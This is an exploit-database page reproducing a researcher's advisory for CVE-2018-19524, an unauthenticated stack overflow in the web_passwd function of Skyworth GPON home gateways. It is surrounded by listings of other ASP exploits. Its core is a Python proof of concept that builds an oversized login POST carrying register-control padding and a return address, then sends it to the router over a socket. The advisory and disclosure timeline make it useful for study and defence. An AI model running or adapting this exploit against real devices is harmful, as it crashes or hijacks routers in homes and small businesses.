Menu

Improved exploit search engine. Try it out

"Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow"

Author

"Kaustubh G. Padwad"

Platform

asp

Release date

2019-02-12

Release Date Title Type Platform Author
2019-05-06 "microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection" webapps asp "felipe andrian"
2019-02-12 "Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow" dos asp "Kaustubh G. Padwad"
2018-11-05 "Advantech WebAccess SCADA 8.3.2 - Remote Code Execution" webapps asp "Chris Lyne"
2018-05-29 "IssueTrak 7.0 - SQL Injection" webapps asp "Chris Anastasio"
2018-05-24 "ASP.NET jVideo Kit - 'query' SQL Injection" webapps asp AkkuS
2018-05-16 "totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery" webapps asp "Compass Security"
2018-03-30 "Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)" webapps asp "Todor Donev"
2018-03-30 "Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change" webapps asp "Todor Donev"
2018-03-30 "Tenda W316R Wireless Router 5.07.50 - Remote DNS Change" webapps asp "Todor Donev"
2018-03-30 "Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change" webapps asp "Todor Donev"
2017-08-31 "Sitefinity CMS 9.2 - Cross-Site Scripting" webapps asp "Pralhad Chaskar"
2017-09-22 "JitBit HelpDesk < 9.0.2 - Authentication Bypass" webapps asp Kc57
2017-09-18 "DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)" webapps asp "Ihsan Sencan"
2017-09-18 "Digileave 1.2 - Cross-Site Request Forgery (Update Admin)" webapps asp "Ihsan Sencan"
2017-09-18 "Digirez 3.4 - Cross-Site Request Forgery (Update Admin)" webapps asp "Ihsan Sencan"
2017-09-13 "ICAffiliateTracking 1.1 - Authentication Bypass" webapps asp "Ihsan Sencan"
2017-06-05 "Kronos Telestaff < 2.92EU29 - SQL Injection" webapps asp "Goran Tuzovic"
2018-02-16 "EPIC MyChart - X-Path Injection" webapps asp "Shayan S"
2015-09-28 "Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload" webapps asp "Pedro Ribeiro"
2014-08-23 "LiveWorld Multiple Products - Cross Site Scripting" webapps asp "GulfTech Security"
2003-12-18 "ASPapp Multiple Products - Multiple Vulnerabilities" webapps asp "GulfTech Security"
2003-12-15 "DUWare Multiple Products - Multiple Vulnerabilities" webapps asp "GulfTech Security"
2016-06-07 "Cisco EPC 3928 - Multiple Vulnerabilities" webapps asp "Patryk Bogdan"
2016-06-06 "Notilus Travel Solution Software 2012 R3 - SQL Injection" webapps asp "Alex Haynes"
2016-05-24 "AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XML External Entity Injection" webapps asp "Mehmet Ince"
2016-05-06 "DotNetNuke 07.04.00 - Administration Authentication Bypass" webapps asp "Marios Nicolaides"
2016-02-22 "Thru Managed File Transfer Portal 9.0.2 - SQL Injection" webapps asp "SySS GmbH"
2016-01-13 "WhatsUp Gold 16.3 - Remote Code Execution" webapps asp "Matt Buzanowski"
2014-05-16 "CIS Manager - 'email' SQL Injection" webapps asp Edge
2014-02-22 "eshtery CMS - 'FileManager.aspx' Local File Disclosure" webapps asp peng.deng
Release Date Title Type Platform Author
2019-02-12 "Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow" dos asp "Kaustubh G. Padwad"
2016-02-16 "ManageEngine Network Configuration Management Build 11000 - Privilege Escalation" webapps multiple "Kaustubh G. Padwad"
2016-02-16 "ManageEngine OPutils 8.0 - Multiple Vulnerabilities" webapps multiple "Kaustubh G. Padwad"
2016-02-02 "Manage Engine Network Configuration Manager Build 11000 - Cross-Site Request Forgery" webapps multiple "Kaustubh G. Padwad"
2015-05-08 "WordPress Plugin Ad Inserter 1.5.2 - Cross-Site Request Forgery" webapps php "Kaustubh G. Padwad"
2015-05-08 "Manage Engine Asset Explorer 6.1.0 Build: 6110 - Cross-Site Request Forgery" webapps windows "Kaustubh G. Padwad"
2015-05-08 "WordPress Plugin ClickBank Ads 1.7 - Cross-Site Request Forgery" webapps php "Kaustubh G. Padwad"
2015-05-08 "WordPress Plugin Ultimate Profile Builder 2.3.3 - Cross-Site Request Forgery" webapps php "Kaustubh G. Padwad"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46358/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46358/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46358/40802/skyworth-gpon-homegateways-and-optical-network-terminals-stack-overflow/download/", "exploit_id": "46358", "exploit_description": "\"Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow\"", "exploit_date": "2019-02-12", "exploit_author": "\"Kaustubh G. Padwad\"", "exploit_type": "dos", "exploit_platform": "asp", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
'''
========================================================
Unauthenticated  Stack Overflow in Multiple Gpon Devices
========================================================

. contents:: Table Of Content

Overview
========

Title:- StackOverflow in Multiple Skyworth GPON HomeGateways and Optical Network terminals. 
CVE-ID :- CVE-2018-19524
Author: Kaustubh G. Padwad
Vendor: Shenzhen Skyworth Digital Technology Company Ltd.(http://www.skyworthdigital.com/products)
Products:
   1.DT741 Converged Intelligent Terminal (G/EPON+IPTV)
  2.DT741 Converged Intelligent Terminal (G/EPON+IPTV)
  3.DT721-cb GPON uplink home gateway (GPON+2FE+1POTS)
  4.DT721-cb GPON Uplink Home Gateway (GPON+2FE+1POTS)
  5.DT741-cb GPON uplink home gateway (GPON+4FE+1POTS+WIFI+USB)
  6.DT741-cb GPON Uplink Home Gateway (GPON+4FE+1POTS+WIFI+USB)
  7.DT741-cbGPON uplink home gateway DT741-cb


Tested Version: : Multiple versions
Severity: High--Critical

Advisory ID
============
KSA-Dev-001

About the Product:
==================

* The (products from above list)  is a high performance GPON access gateway that complies with ITU-G.984 and CTC standards.
* Configure a GPON optical interface, two FEs, one POTS
* Provide Ethernet, VOIP and other interfaces to meet the access requirements of different devices.
* It can provide high-performance broadband access services for home users, individual users, and SOHO small businesses.
* Supports the standard TR069 protocol,which can be flexibly customized according to the carrier network and is compatible with mainstream OLT,software switching and service management platforms

Description: 
============
An issue was discovered on Shenzhen Skyworth
DT741 Converged Intelligent Terminal (G/EPON+IPTV) SDOTBGN1,DT721-cb SDOTBGN1,and DT741-cb SDOTBGN1 devices.
A long password to the Web_passwd function allows remote attackers to cause a denial of service (segmentation fault) or
achieve unauthenticated remote code execution because of control of registers
S0 through S4 and T4 through T7.


Additional Information
========================
The value of password under Web_passwd function is not getting sanitized,so passing too much junk data to the password parameter triggers to the SIGSEGV segmentation fault in device, post research it
was possible to control the registers from S0-S4 and T4-T7.A Successful exploitation could leads to unauthenticated remote code execution on device.


[Affected Component]
web_passwd function inside the boa web server implementation.

------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Denial of Service]
true

------------------------------------------
[Attack Vectors]
Remote code execution by running the poc.py against the target ip address.

[Vulnerability Type]
====================
Buffer Overflow,Exec

How to Reproduce: (POC):
========================

One can use below exploit
'''

import socket
import struct

buf = "POST /cgi-bin/index2.asp  HTTP/1.1\r\nHOST: 192.168.1.1\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://192.168.1.2/cgi-bin/index2.asp\r\nCookie: LoginTimes=0\r\nConnection: Close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1714\r\n\n"
buf+="Username=Bufferoverflow"
buf+="&Logoff=0" 
buf+="&LoginTimes=1"
buf+="&LoginTimes_Zero=0"
buf+="&value_one=1"
buf+="&Password1=xss"
buf+="&Password2=xss"
buf+="&logintype=usr"
buf+="&Password="
buf+="A"*999 #Padding till T4
buf+="T4T4" #T4 Address 0x2BB30D5C kill address based on libc
buf+="T7T7" #T7 sleep address based on libc
buf+="B"*9 #Padding till T6
buf+= "T6T6" #T7 Address Sleep Address Based on libc negetive
buf+="K"*8 #Padding between T6to s0
buf+="S0S0" #S0 Address sleep address boa possitive
buf+="S1S1" #S1 Address Sleep Address Boa negetive
buf+="S2S2" #S2 Address Normal Sleep Adress
buf+="S3S3" #S3Address System Address
buf+="\xA0\x0E\xA2\x18" #return Address
buf+="K"*600


print buf
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.1", 80))
s.send(buf)

'''
Mitigation
==========

No Official mitigation recived from vendor.

[Vendor of Product]
Shenzhen Skyworth Digital Technology Company Ltd.(http://www.skyworthdigital.com/products)

Disclosure: 
===========
01-Nov-2018 Discoverd the vulnerability
03-Nov-2018 Reported to vendor (No Response)
13-Nov-2018 follow-up-01 (No reposonse.)
24-Nov-2018 Requested for CVE/Cve's.
26-Nov-2018 CVE-Assign by Mitre

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
'''